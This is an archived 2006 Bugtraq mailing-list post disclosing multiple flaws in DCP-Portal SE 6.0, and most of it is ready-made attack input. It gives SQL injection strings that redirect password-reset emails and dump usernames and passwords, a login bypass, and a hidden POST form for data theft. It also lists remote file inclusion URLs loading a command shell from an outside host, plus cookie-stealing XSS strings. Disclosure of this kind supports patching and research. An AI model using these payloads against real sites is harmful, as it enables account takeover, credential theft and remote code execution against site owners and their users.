lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: 14 Sep 2006 11:39:14 -0000
From: security@...or.net
To: bugtraq@...urityfocus.com
Subject: DCP-Portal SE  6.0  multiple injections

Hello,,


DCP-Portal SE  6.0  multiple injections


Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@...or.net

sql injections
if magic_qoutes_gpc = off
/*************************************/

lostpassword.php

you can recive the reset password email on your email for any user you want :)
change youremail@...rserver.com to your real email
example :
-1' union select uid ,sex,name,surname,'youremail@...rserver.com',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members/*

and you will recive email reset password for all the members in this website

and if you want to recive the password for speciate user id example uid=1 or change 1 for the userid

-1' union select uid ,sex,name,surname,'youremail@...rserver.com',birthdate,address,zip,city,country,job,tel,language,hideinfo,list,username,password,signature,admin,active,date from dcp5_members where uid=1/*

---------------------------
login
try the user name as
' or uid=1/*

or change the uid value for any username you want log with
---------------------------
file calendar.php
Sql injection by post method ,, try this form :)

<form name="hack" action="calendar.php" method=post>
<input type=hidden name='year' value="-1' union select uid,username,password,null,null from dcp5_members where uid='1">
<input type=submit>
</form>

---------------------------
file search.php

try one of these ,, bcause the number of columns changes from section to another :)
if you searched for (content,news,link,forum)
use
xx%') union select uid,username,password from dcp5_members/*

if you searched for (doc,anns)
use
xx%') union select uid,username,password,password from dcp5_members/*
/*************************************/

Remote File including
library/lib.php?root=http://www.soqor.net/tools/cmd.txt?
library/editor/editor.php?root=http://www.soqor.net/tools/cmd.txt?

/*************************************/

Fill path
library/editor/editor.php
library/lib.php

/*************************************/

Xss
admin/inc/footer.inc.php?root_url="><Script>alert(document.cookie);</script><"
admin/inc/footer.inc.php?dcp_version=<Script>alert(document.cookie);</script>

admin/inc/header.inc.php?root_url="><Script>alert(document.cookie);</script><"
admin/inc/header.inc.php?page_top_name=<Script>alert(document.cookie);</script>
admin/inc/header.inc.php?page_name=<Script>alert(document.cookie);</script>
admin/inc/header.inc.php?page_options=<Script>alert(document.cookie);</script>

/*************************************/
WwW.SoQoR.NeT

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ